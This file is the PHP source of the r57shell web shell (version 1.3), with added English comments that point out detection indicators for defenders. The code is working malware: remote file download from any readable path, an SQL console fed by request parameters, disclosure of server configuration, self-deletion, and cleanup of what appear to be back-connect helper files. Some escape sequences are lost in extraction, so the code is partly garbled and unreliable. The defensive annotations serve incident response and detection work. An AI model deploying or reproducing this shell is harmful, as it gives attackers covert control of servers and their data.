<?php
/
***********************************************************************************
*******************/
/*
/*                                       #       #        #     #
/*                                       #     #            #   #
/*                                     #       #            #     #
/*                                     #     ##     ####    ##    #
/*                                    ##     ## ###### ##         ##
/*                                    ##     ## ###### ##         ##
/*                                    ##     ##     ####    ##    ##
/*                                    ###      ############     ###
/*                                    ########################
/*                                           ##############
/*                                 ######## ########## #######
/*                                ###      ## ########## ##          ###
/*                                ###      ## ########## ##          ###
/*                                 ###      # ########## #          ###
/*                                 ###      ## ######## ##          ###
/*                                  ##       #     ######     #     ##
/*                                    ##     #      ####    #     ##
/*                                       ##                     ##
/* r57shell.php - скрипт на пхп позволяющий вам выполнять системные команды на сервере через браузер
/* Вы можете скачать новую версию на нашем сайте: http://c99shell.com
/* Версия: 1.3 (05.03.2006)
/
*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~*/
/* Отдельная благодарность за помощь и идеи: blf, phoenix, virus, NorD и всем чертям из RST/GHC.
/* Если у вас есть какие-либо идеи по поводу того какие функции следует добавить в скрипт то пишите
/* на rst@void.ru. Все предложения будут рассмотрены.
/
*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~*/
/* (c)oded by 1dt.w0lf
/* RST/GHC http://c99shell.com , http://ghc.ru
/* ANY MODIFIED REPUBLISHING IS RESTRICTED
/
***********************************************************************************
*******************/
/* ~~~ Íà ñòðîéêè | Options ~~~ */

// Interface language | Language
// $language='ru'  - Russian
// $language='eng' - English
// NOTE(review): in this copy the 'eng_*' entries of $lang further down are largely Turkish,
// which suggests a redistributed, modified build rather than the author's original.
$language='eng';

// Authentication | Authentification
// $auth = 1; - authentication on
// $auth = 0; - authentication off
// As configured here the HTTP Basic gate below is disabled, so every request handler in this
// file is reachable by anyone who can request the script's URL.
$auth = 0;

// Login & password for access to the script.
// Author's warning: change these before placing the file on a server (CHANGE THIS!!!).
// Login & password are stored as md5 hex digests; per the author the default for both is 'r57'.
// Triage note: the digest below is a fixed string in unmodified copies of this file, so it can
// serve as a static indicator when scanning a web root; a modified copy may carry other values.
$name='ec371748dc2da624b35a4f8f685dd122'; // user login (md5 hex)
$pass='ec371748dc2da624b35a4f8f685dd122'; // user password (md5 hex)
/
***********************************************************************************
*******************/
// Runtime preparation executed on every request, before any handler runs.
// All PHP error output is switched off, so a failing handler leaves nothing in the response.
error_reporting(0);
// NOTE(review): set_magic_quotes_runtime() was removed in PHP 7.0 and is called here without @,
// so this file as written targets PHP 4/5-era interpreters.
set_magic_quotes_runtime(0);
// Lift the execution time limit and disable output buffering (failures are hidden by @).
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
// Remember whether safe_mode is active; nothing in the visible part of the file reads it yet.
$safe_mode = @ini_get('safe_mode');
$version = "1.3";
// Compatibility shim for PHP older than 4.1.0, which had no $_POST/$_GET/$_SERVER superglobals.
if(version_compare(phpversion(), '4.1.0') == -1)
  {
  $_POST    = &$HTTP_POST_VARS;
  $_GET     = &$HTTP_GET_VARS;
  $_SERVER = &$HTTP_SERVER_VARS;
  }
// Undo magic_quotes_gpc escaping so POST and SERVER values are handled raw.
// $_GET is not unescaped here.
if (@get_magic_quotes_gpc())
  {
  foreach ($_POST as $k=>$v)
    {
    $_POST[$k] = stripslashes($v);
    }
  foreach ($_SERVER as $k=>$v)
    {
    $_SERVER[$k] = stripslashes($v);
    }
  }

// Optional HTTP Basic authentication gate; it only runs when $auth is 1.
// The supplied user name and password are md5-hashed and compared with $name and $pass.
// On a missing or wrong credential the script sends a 401 with realm "r57shell" and exits.
// Triage note: the realm string and the "Access Denied" body below are fixed strings, so they
// can be searched for in captured responses or proxy logs when hunting for this file.
if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name ||
md5($_SERVER['PHP_AUTH_PW'])!==$pass)
   {
   header('WWW-Authenticate: Basic realm="r57shell"');
   header('HTTP/1.0 401 Unauthorized');
   exit("<b><a href=http://c99shell.com>r57shell</a> : Access Denied</b>");
   }
}
// Static page header (HTML comment, <title>, charset declaration and inline CSS) that the
// handlers below echo before their own output. It contains no request data.
// Triage note: the <title>r57shell</title> element and the windows-1251 charset declaration are
// fixed strings in the rendered page.
$head = '<!-- Çäðà âñòâóé Çà ñÿ -->
<html>
<head>
<title>r57shell</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">

<STYLE>
tr {
BORDER-RIGHT:   #aaaaaa 1px solid;
BORDER-TOP:    #E8481C 1px solid;
BORDER-LEFT:   #E8481C 1px solid;
BORDER-BOTTOM: #aaaaaa 1px solid;
}
td {
BORDER-RIGHT: #aaaaaa 1px solid;
BORDER-TOP:    #E8481C 1px solid;
BORDER-LEFT:   #E8481C 1px solid;
BORDER-BOTTOM: #aaaaaa 1px solid;
}
.table1 {
BORDER-RIGHT: #3A6EA5 0px;
BORDER-TOP:    #3A6EA5 0px;
BORDER-LEFT:   #3A6EA5 0px;
BORDER-BOTTOM: #3A6EA5 0px;
BACKGROUND-COLOR: #81D1EE;
}
.td1 {
BORDER-RIGHT: #3A6EA5 0px;
BORDER-TOP:    #3A6EA5 0px;
BORDER-LEFT:   #3A6EA5 0px;
BORDER-BOTTOM: #3A6EA5 0px;
font: 7pt Verdana;
}
.tr1 {
BORDER-RIGHT: #3A6EA5 0px;
BORDER-TOP:    #3A6EA5 0px;
BORDER-LEFT:   #3A6EA5 0px;
BORDER-BOTTOM: #3A6EA5 0px;
}
table {
BORDER-RIGHT: #E8481C 1px outset;
BORDER-TOP:    #E8481C 1px outset;
BORDER-LEFT:   #E8481C 1px outset;
BORDER-BOTTOM: #E8481C 1px outset;
BACKGROUND-COLOR: #81D1EE;
}
input {
BORDER-RIGHT: #000000 1px solid;
BORDER-TOP:    #FC602B 1px solid;
BORDER-LEFT:   #FC602B 1px solid;
BORDER-BOTTOM: #000000 1px solid;
BACKGROUND-COLOR: #FFFFFF;
font: 8pt Verdana;
}
select {
BORDER-RIGHT: #000000 1px solid;
BORDER-TOP:    #FC602B 1px solid;
BORDER-LEFT:   #FC602B 1px solid;
BORDER-BOTTOM: #000000 1px solid;
BACKGROUND-COLOR: #FFFFFF;
font: 8pt Verdana;
}
submit {
BORDER-RIGHT: buttonhighlight 2px    outset;
BORDER-TOP:    buttonhighlight 2px   outset;
BORDER-LEFT:   buttonhighlight 2px   outset;
BORDER-BOTTOM: buttonhighlight 2px   outset;
BACKGROUND-COLOR: #FFFFFF;
width: 30%;
}
textarea {
BORDER-RIGHT: #000000 1px solid;
BORDER-TOP:     #FC602B 1px solid;
BORDER-LEFT:    #FC602B 1px solid;
BORDER-BOTTOM: #000000 1px solid;
BACKGROUND-COLOR: #FFFFFF;
font: Fixedsys bold;
}
BODY {
margin-top: 1px;
margin-right: 1px;
margin-bottom: 1px;
margin-left: 1px;
}
A:link {COLOR:white; TEXT-DECORATION: none}
A:visited { COLOR:white; TEXT-DECORATION: none}
A:active {COLOR:white; TEXT-DECORATION: none}
A:hover {color:blue;TEXT-DECORATION: none}
</STYLE>';
// In-memory ZIP archive builder. addFile() appends one deflate-compressed entry; file() returns
// the finished archive as a string. compress() below uses it for the 'zip' download option.
//
// NOTE(review): the string constants in this listing ("x50x4bx05x06...", 'x' . $dtime[6] ...)
// look like hex escapes whose backslashes were lost when the page was extracted. As printed they
// are literal text, not binary signature bytes, so byte patterns taken from this page will not
// match a real sample - confirm against an original copy before writing signatures.
class zipfile
{
    // Local file records, one string per added entry.
    var $datasec       = array();
    // Central directory records, one string per added entry.
    var $ctrl_dir      = array();
    // End-of-central-directory prefix (see the extraction note on the class).
    var $eof_ctrl_dir = "x50x4bx05x06x00x00x00x00";
    // Running byte offset of the next local record inside the archive.
    var $old_offset    = 0;
    // Packs a Unix timestamp (0 = current time) into one integer: year-1980, month, day, hours,
    // minutes and seconds/2 in successive bit fields. Dates before 1980 are clamped to 1980-01-01.
    function unix2DosTime($unixtime = 0) {
        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
        if ($timearray['year'] < 1980) {
             $timearray['year']    = 1980;
             $timearray['mon']     = 1;
             $timearray['mday']    = 1;
             $timearray['hours']   = 0;
             $timearray['minutes'] = 0;
             $timearray['seconds'] = 0;
        }
        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) |
($timearray['mday'] << 16) |
                 ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) |
($timearray['seconds'] >> 1);
    }
    // Adds one entry: $data is the file content, $name the path stored in the archive, $time an
    // optional Unix timestamp. Appends a local record to $datasec and a matching central
    // directory record to $ctrl_dir.
    function addFile($data, $name, $time = 0)
    {
        // NOTE(review): the search string is empty in this listing; presumably a backslash
        // (path separator normalisation) that was lost in extraction - confirm.
        $name      = str_replace('', '/', $name);
        $dtime     = dechex($this->unix2DosTime($time));
        // Reorders the hex digits pairwise, last pair first; indexes 0-7 assume dechex()
        // returned eight digits.
        $hexdtime = 'x' . $dtime[6] . $dtime[7]
                   . 'x' . $dtime[4] . $dtime[5]
                   . 'x' . $dtime[2] . $dtime[3]
                   . 'x' . $dtime[0] . $dtime[1];
        // eval() re-parses the assembled text as a double-quoted PHP string. The input here is
        // derived from dechex() of a computed integer, not from request data. Static scanners
        // will still flag the eval() call.
        eval('$hexdtime = "' . $hexdtime . '";');
        // Local file record: fixed header fields, timestamp, CRC, sizes, name, compressed data.
        $fr    = "x50x4bx03x04";
        $fr    .= "x14x00";
        $fr    .= "x00x00";
        $fr    .= "x08x00";
        $fr    .= $hexdtime;
        $unc_len = strlen($data);
        $crc      = crc32($data);
        $zdata    = gzcompress($data);
        // Drop the first 2 and last 4 bytes of the gzcompress() output before storing it.
$zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
        $c_len   = strlen($zdata);
        $fr      .= pack('V', $crc);
        $fr      .= pack('V', $c_len);
        $fr      .= pack('V', $unc_len);
        $fr      .= pack('v', strlen($name));
        $fr      .= pack('v', 0);
        $fr      .= $name;
        $fr .= $zdata;
        $this -> datasec[] = $fr;
        // Central directory record for the same entry.
        $cdrec = "x50x4bx01x02";
        $cdrec .= "x00x00";
        $cdrec .= "x14x00";
        $cdrec .= "x00x00";
        $cdrec .= "x08x00";
        $cdrec .= $hexdtime;
        $cdrec .= pack('V', $crc);
        $cdrec .= pack('V', $c_len);
        $cdrec .= pack('V', $unc_len);
        $cdrec .= pack('v', strlen($name) );
        $cdrec .= pack('v', 0 );
        $cdrec .= pack('v', 0 );
        $cdrec .= pack('v', 0 );
        $cdrec .= pack('v', 0 );
        $cdrec .= pack('V', 32 );
        // Offset of this entry's local record, then advance the offset for the next entry.
        $cdrec .= pack('V', $this -> old_offset );
        $this -> old_offset += strlen($fr);
        $cdrec .= $name;
        $this -> ctrl_dir[] = $cdrec;
    }
    // Returns the archive: all local records, all central directory records, then the end
    // record carrying the entry count (twice), the directory size and the directory offset.
    function file()
    {
        $data    = implode('', $this -> datasec);
        $ctrldir = implode('', $this -> ctrl_dir);
        return
            $data .
            $ctrldir .
            $this -> eof_ctrl_dir .
            pack('v', sizeof($this -> ctrl_dir)) .
            pack('v', sizeof($this -> ctrl_dir)) .
            pack('V', strlen($ctrldir)) .
            pack('V', strlen($data)) .
            "x00x00";
    }
}
// Optionally compresses a file body before it is sent as a download.
//   $filename  (by reference) gets '.bz2', '.gz' or '.zip' appended when that format is applied.
//   $filedump  (by reference) is replaced by the compressed bytes.
//   $compress  is 'bzip', 'gzip' or 'zip'; any other value, or a missing PHP extension, leaves
//              the data untouched and sets the MIME type to application/octet-stream.
// Results are also passed back through the globals $mime_type and $content_encoding.
// The download handler calls this with $_POST['compress'] as the third argument.
function compress(&$filename,&$filedump,$compress)
  {
    global $content_encoding;
    global $mime_type;
    if ($compress == 'bzip' && @function_exists('bzcompress'))
     {
        $filename .= '.bz2';
        $mime_type = 'application/x-bzip2';
        $filedump = bzcompress($filedump);
     }
     else if ($compress == 'gzip' && @function_exists('gzencode'))
     {
        $filename .= '.gz';
        $content_encoding = 'x-gzip';
$mime_type = 'application/x-gzip';
        $filedump = gzencode($filedump);
     }
     else if ($compress == 'zip' && @function_exists('gzcompress'))
     {
      $filename .= '.zip';
        $mime_type = 'application/zip';
        $zipfile = new zipfile();
        // '.zip' was just appended, so substr(..., 0, -4) stores the entry under the original name.
        $zipfile -> addFile($filedump, substr($filename, 0, -4));
        $filedump = $zipfile -> file();
     }
     else
     {
      $mime_type = 'application/octet-stream';
     }
 }
// Sends $attach (array with 'type', 'name' and 'content') by e-mail via mail(), with the
// base64-encoded content placed in the header block and an empty message body.
// Returns 1 when mail() reports success, otherwise 0.
// None of $to, $from, $subj or the $attach fields is filtered before being placed in headers.
// The call site is not in the visible part of the file.
// NOTE(review): this listing appears to have lost backslashes in extraction: "rn" is presumably
// a CRLF escape and the name="..." quoting on the fourth header line is not valid PHP as printed.
// Monitoring note: outbound mail originating from the web server account with an attachment and
// an empty body is the observable effect of this function.
function mailattach($to,$from,$subj,$attach)
 {
 $headers = "From: $fromrn";
 $headers .= "MIME-Version: 1.0rn";
 $headers .= "Content-Type: ".$attach['type'];
 $headers .= "; name="".$attach['name'].""rn";
 $headers .= "Content-Transfer-Encoding: base64rnrn";
 $headers .= chunk_split(base64_encode($attach['content']))."rn";
 if(@mail($to,$subj,"",$headers)) { return 1; }
 return 0;
 }
// Thin client wrapper over four legacy database extensions, selected by the string in $db:
// 'MySQL' (mysql_*), 'MSSQL' (mssql_*), 'PostgreSQL' (pg_*) and 'Oracle' (oci*).
// The db_query handler fills every connection field directly from POST parameters, so the
// class lets a remote user run arbitrary statements against any database the web server can
// reach with the credentials they supply.
// Every extension call is prefixed with @, so failures produce no PHP warnings.
// NOTE(review): several lines in this listing are wrapped in the middle of a "->" token or a
// string literal (an artifact of the page layout); the code is reproduced as printed.
class my_sql
 {
 var $host = 'localhost';
 var $port = '';
 var $user = '';
 var $pass = '';
 var $base = '';
 // Backend selector: 'MySQL', 'MSSQL', 'PostgreSQL' or 'Oracle'.
 var $db    = '';
 var $connection;
 // Last result/statement handle, and the last error text.
 var $res;
 var $error;
 // Filled by get_result(): fetched rows, column names and counts.
 var $rows;
 var $columns;
 var $num_rows;
 var $num_fields;
 // Filled by dump(): lines of a textual table dump.
 var $dump;

 // Opens the connection for the selected backend, defaulting the port to 3306 / 1433 / 5432
 // when empty. Returns 1 on success, 0 when the extension is missing or the connect fails.
 function connect()
  {
      switch($this->db)
     {
        case 'MySQL':
         if(empty($this->port)) { $this->port = '3306'; }
         if(!function_exists('mysql_connect')) return 0;
         $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,
$this->pass);
         if(is_resource($this->connection)) return 1;
        break;
     case 'MSSQL':
       if(empty($this->port)) { $this->port = '1433'; }
         if(!function_exists('mssql_connect')) return 0;
         $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,
$this->pass);
       if($this->connection) return 1;
     break;
     case 'PostgreSQL':
       if(empty($this->port)) { $this->port = '5432'; }
       // Connection string is built by concatenation; the field values are not quoted or escaped.
       $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."'
password='".$this->pass."' dbname='".$this->base."'";
       if(!function_exists('pg_connect')) return 0;
       $this->connection = @pg_connect($str);
       if(is_resource($this->connection)) return 1;
     break;
     case 'Oracle':
       if(!function_exists('ocilogon')) return 0;
       $this->connection = @ocilogon($this->user, $this->pass, $this->base);
       if(is_resource($this->connection)) return 1;
     break;
     }
    return 0;
  }

 // Selects $base on MySQL/MSSQL. For PostgreSQL and Oracle it simply returns 1, because the
 // database name was already passed at connect time. Returns 0 on failure or unknown backend.
 function select_db()
  {
    switch($this->db)
     {
        case 'MySQL':
         if(@mysql_select_db($this->base,$this->connection)) return 1;
     break;
     case 'MSSQL':
         if(@mssql_select_db($this->base,$this->connection)) return 1;
     break;
     case 'PostgreSQL':
       return 1;
     break;
     case 'Oracle':
       return 1;
     break;
     }
    return 0;
  }

 // Runs $query as given. Return value: 0 = error ($error is set), 1 = a result set is
 // available for get_result(), 2 = the statement ran without a result set.
 // For Oracle the mapping is by row count: a non-zero ocirowcount() yields 2, otherwise 1.
 function query($query)
  {
    $this->res=$this->error='';
    switch($this->db)
     {
        case 'MySQL':
       // Every MySQL statement is prefixed with a comment that contains a NUL byte.
       // NOTE(review): the purpose is not evident from this file. For defenders the prefix is
       // a distinctive marker to look for in MySQL general/audit logs.
       if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this-
>connection)))
        {
        $this->error = @mysql_error($this->connection);
        return 0;
        }
       else if(is_resource($this->res)) { return 1; }
       return 2;
        break;
     case 'MSSQL':
       if(false===($this->res=@mssql_query($query,$this->connection)))
        {
        $this->error = 'Query error';
return 0;
        }
        else if(@mssql_num_rows($this->res) > 0) { return 1; }
       return 2;
     break;
     case 'PostgreSQL':
       if(false===($this->res=@pg_query($this->connection,$query)))
        {
        $this->error = @pg_last_error($this->connection);
        return 0;
        }
        else if(@pg_num_rows($this->res) > 0) { return 1; }
       return 2;
     break;
     case 'Oracle':
       if(false===($this->res=@ociparse($this->connection,$query)))
        {
        $this->error = 'Query parse error';
        }
       else
        {
        if(@ociexecute($this->res))
          {
          if(@ocirowcount($this->res) != 0) return 2;
          return 1;
          }
        $error = @ocierror();
        $this->error=$error['message'];
        }
     break;
     }
  return 0;
  }
 // Fetches every row of the last result into $rows (associative arrays), sets $num_rows,
 // $num_fields and $columns, and frees the result. Returns 1 when at least one row was
 // counted, otherwise 0.
 // The fetch loop assigns before it tests, so $rows ends with one extra false element.
 function get_result()
  {
    $this->rows=array();
    $this->columns=array();
    $this->num_rows=$this->num_fields=0;
    switch($this->db)
     {
        case 'MySQL':
         $this->num_rows=@mysql_num_rows($this->res);
         $this->num_fields=@mysql_num_fields($this->res);
         while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
         @mysql_free_result($this->res);
         if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
     break;
     case 'MSSQL':
         $this->num_rows=@mssql_num_rows($this->res);
         $this->num_fields=@mssql_num_fields($this->res);
         while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
         @mssql_free_result($this->res);
         if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return
1;};
     break;
     case 'PostgreSQL':
         $this->num_rows=@pg_num_rows($this->res);
         $this->num_fields=@pg_num_fields($this->res);
         while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
@pg_free_result($this->res);
          if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
      break;
      case 'Oracle':
        // Oracle has no row-count call here; rows are counted while fetching.
        $this->num_fields=@ocinumcols($this->res);
        while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this-
>num_rows++;
        @ocifreestatement($this->res);
        if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
      break;
      }
     return 0;
   }
 // Builds a textual dump of $table into $this->dump: a '##' comment header, then (MySQL only)
 // the SHOW CREATE TABLE output, then one INSERT statement per row. Oracle is a stub.
 // Returns 1 on success, 0 on an empty table name, unknown backend, failed query or empty result.
 // $table is concatenated into the SQL text without validation.
 // Triage note: the '## MySQL dump' / '## MSSQL dump' / '## PostgreSQL dump' header lines are
 // fixed strings that would appear in any dump file this routine produced.
 // NOTE(review): the VALUES (''. ... .''); fragments look like escaped quotes that lost their
 // backslashes in extraction; reproduced as printed.
 function dump($table)
   {
     if(empty($table)) return 0;
     $this->dump=array();
     $this->dump[0] = '##';
     $this->dump[1] = '## --------------------------------------- ';
     $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s");
     $this->dump[3] = '## Database: '.$this->base;
     $this->dump[4] = '##     Table: '.$table;
     $this->dump[5] = '## --------------------------------------- ';
     switch($this->db)
      {
         case 'MySQL':
          $this->dump[0] = '## MySQL dump';
          if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return
0;
          if(!$this->get_result()) return 0;
          $this->dump[] = $this->rows[0]['Create Table'];
        $this->dump[] = '## --------------------------------------- ';
          if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
          if(!$this->get_result()) return 0;
          for($i=0;$i<$this->num_rows;$i++)
           {
         foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] =
@mysql_real_escape_string($v);}
           $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this-
>columns).'`) VALUES (''.@implode("', '", $this->rows[$i]).'');';
           }
      break;
      case 'MSSQL':
        $this->dump[0] = '## MSSQL dump';
        if($this->query('SELECT * FROM '.$table)!=1) return 0;
          if(!$this->get_result()) return 0;
          for($i=0;$i<$this->num_rows;$i++)
           {
         foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
           $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this-
>columns).') VALUES (''.@implode("', '", $this->rows[$i]).'');';
           }
      break;
      case 'PostgreSQL':
        $this->dump[0] = '## PostgreSQL dump';
        if($this->query('SELECT * FROM '.$table)!=1) return 0;
          if(!$this->get_result()) return 0;
          for($i=0;$i<$this->num_rows;$i++)
           {
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
           $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this-
>columns).') VALUES (''.@implode("', '", $this->rows[$i]).'');';
           }
      break;
      case 'Oracle':
         $this->dump[0] = '## ORACLE dump';
         $this->dump[] = '## under construction';
      break;
      default:
        return 0;
      break;
      }
     return 1;
   }
 // Closes the connection of the selected backend; unknown backends are ignored.
 function close()
   {
     switch($this->db)
      {
         case 'MySQL':
          @mysql_close($this->connection);
      break;
      case 'MSSQL':
        @mssql_close($this->connection);
      break;
      case 'PostgreSQL':
        @pg_close($this->connection);
      break;
      case 'Oracle':
        @oci_close($this->connection);
      break;
      }
   }
 // Returns the backend's affected-row count for the last statement handle in $res,
 // or 0 for an unknown backend.
 function affected_rows()
   {
     switch($this->db)
      {
         case 'MySQL':
          return @mysql_affected_rows($this->res);
      break;
      case 'MSSQL':
        return @mssql_affected_rows($this->res);
      break;
      case 'PostgreSQL':
        return @pg_affected_rows($this->res);
      break;
      case 'Oracle':
        return @ocirowcount($this->res);
      break;
      default:
        return 0;
      break;
      }
   }
 }
// GET ?img=N : serves one of two small GIF images embedded as base64 and stops.
// The images are decoded from constants in this file; the request value is only used as an
// array index (an unknown index decodes an empty value).
// Triage note: requests of the form <script>?img=1 or ?img=2 returning image/gif from a .php
// file are a recognisable access-log pattern for this page.
if(isset($_GET['img'])&&!empty($_GET['img']))
 {
 $images = array();
 $images[1]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw
==';
 $images[2]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw
==';
 @ob_clean();
 header("Content-type: image/gif");
 echo base64_decode($images[$_GET['img']]);
 die();
 }
// POST cmd=download_file : reads the server-side path given in d_name and returns its content
// as an attachment, optionally compressed according to the 'compress' parameter.
// The path is taken from the request unchanged, so any file readable by the web server account
// can be retrieved. This is the file-exfiltration path of the script.
// Triage note: POST bodies containing cmd=download_file and d_name=<path> are the request
// signature; the response carries a Content-disposition: attachment header.
// re() is defined outside the visible part of the file; it is called when the open fails.
// NOTE(review): the filename="..." quoting in the Content-disposition line is not valid PHP as
// printed, presumably because escaped quotes lost their backslashes in extraction.
if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_file"
&& !empty($_POST['d_name']))
 {
   if(!$file=@fopen($_POST['d_name'],"r")) { echo re($_POST['d_name']);
$_POST['cmd']=""; }
   else
    {
      @ob_clean();
      // Only the base name is sent to the client; the whole file is read in one call.
      $filename = @basename($_POST['d_name']);
      $filedump = @fread($file,@filesize($_POST['d_name']));
      fclose($file);
      $content_encoding=$mime_type='';
      compress($filename,$filedump,$_POST['compress']);
      if (!empty($content_encoding)) { header('Content-Encoding: ' .
$content_encoding); }
      header("Content-type: ".$mime_type);
      header("Content-disposition: attachment; filename="".$filename."";");
      echo $filedump;
      exit();
    }
 }
// GET ?phpinfo : prints the full phpinfo() page followed by a BACK link, then stops.
// This discloses the interpreter version, loaded extensions, configuration and environment to
// the requester. PHP_SELF is written into the link without escaping.
if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font
face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]
</b></font></div>"; die(); }
// POST cmd=db_query : interactive SQL console.
// Backend type, server, port, login, password and database name all come from POST fields
// (db, db_server, db_port, mysql_l, mysql_p, mysql_db). The db_query text is split on ';' and
// each fragment longer than five characters is executed through my_sql::query().
// Result rows and column names are HTML-escaped before display; the error text, the echoed
// query textarea and PHP_SELF are not.
// The form re-posts the connection fields, including the database password, as hidden inputs,
// so those credentials appear in the returned HTML. in() is defined outside the visible part
// of the file.
// Triage note: POST bodies with cmd=db_query together with the mysql_l / mysql_p / mysql_db
// field names are the request signature of this handler.
if ($_POST['cmd']=="db_query")
 {
 echo $head;
 $sql = new my_sql();
 $sql->db     = $_POST['db'];
 $sql->host = $_POST['db_server'];
 $sql->port = $_POST['db_port'];
 $sql->user = $_POST['mysql_l'];
 $sql->pass = $_POST['mysql_p'];
 $sql->base = $_POST['mysql_db'];
 // Naive statement split: a ';' inside a string literal also splits the text.
 $querys = @explode(';',$_POST['db_query']);

 if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2
color=orange><b>Can't connect to SQL server</b></font></div>";
  else
   {
   if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font
face=Verdana size=-2 color=orange><b>Can't select database</b></font></div>";
   else
     {
     foreach($querys as $num=>$query)
       {
         if(strlen($query)>5)
         {
         echo "<font face=Verdana size=-2 color=white><b>Query#".$num." :
".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
         // query() returns 0 = error, 1 = result set, 2 = no result set (affected rows shown).
         switch($sql->query($query))
{
           case '0':
           echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".
$sql->error."</b></font></td></tr></table>";
           break;
           case '1':
           if($sql->get_result())
             {
                  echo "<table width=100%>";
             foreach($sql->columns as $k=>$v) $sql->columns[$k] =
htmlspecialchars($v,ENT_QUOTES);
                  $keys = @implode("&nbsp;</b></font></td><td bgcolor=#3A6EA5><font
face=Verdana size=-2><b>&nbsp;", $sql->columns);
             echo "<tr><td bgcolor=#3A6EA5><font face=Verdana size=-2><b>&nbsp;".
$keys."&nbsp;</b></font></td></tr>";
             for($i=0;$i<$sql->num_rows;$i++)
               {
               foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] =
htmlspecialchars($v,ENT_QUOTES);
               $values = @implode("&nbsp;</font></td><td><font face=Verdana
size=-2>&nbsp;",$sql->rows[$i]);
               echo '<tr><td><font face=Verdana size=-2>&nbsp;'.
$values.'&nbsp;</font></td></tr>';
               }
             echo "</table>";
             }
           break;
           case '2':
           $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
           echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows :
<b>".$ar."</b></font></td></tr></table><br>";
           break;
           }
         }
       }
     }
   }
 // Re-render the query form, carrying the connection parameters forward as hidden fields.
 echo "<br><form name=form method=POST>";
 echo in('hidden','db',0,$_POST['db']);
 echo in('hidden','db_server',0,$_POST['db_server']);
 echo in('hidden','db_port',0,$_POST['db_port']);
 echo in('hidden','mysql_l',0,$_POST['mysql_l']);
 echo in('hidden','mysql_p',0,$_POST['mysql_p']);
 echo in('hidden','mysql_db',0,$_POST['mysql_db']);
 echo in('hidden','cmd',0,'db_query');
 echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!
empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;nSELECT * FROM
user;"))."</textarea><br><input type=submit name=submit value=" Run SQL
query "></div><br><br>";
 echo "</form>";
 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".
$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
 }
// GET ?delete : the script removes itself. The file name is taken as everything after the last
// '/' of PHP_SELF and unlinked relative to the current working directory.
// Incident-response note: because the file can be removed with a single request, its absence
// from disk does not show it was never there. Web access logs (look for ?delete) and
// file-system timeline or backup data are the sources that can still establish its presence.
if(isset($_GET['delete']))
 {
   @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
 }
// GET ?tmp : deletes a fixed list of files under /tmp; failures are hidden by @.
// The code that creates these files is not in the visible part of the file.
// NOTE(review): the names, read together with the 'Bind port', 'back-connect' and 'datapipe'
// interface strings in $lang, suggest they are helper programs and their C sources for those
// features - confirm against the rest of the file.
// Triage note: any of these paths existing on a host, or appearing in file-system timelines,
// is an artifact worth checking when this script is found.
if(isset($_GET['tmp']))
 {
@unlink("/tmp/bdpl");
   @unlink("/tmp/back");
   @unlink("/tmp/bd");
   @unlink("/tmp/bd.c");
   @unlink("/tmp/dp");
   @unlink("/tmp/dpc");
   @unlink("/tmp/dpc.c");
  }
// GET ?phpini : renders every php.ini directive with its local and master value as an HTML
// table (via ini_get_all()), then stops. This discloses the full interpreter configuration to
// the requester. ws() is defined outside the visible part of the file.
if(isset($_GET['phpini']))
{
echo $head;
// Formats one directive value for display: empty -> 'no value', booleans -> TRUE/FALSE,
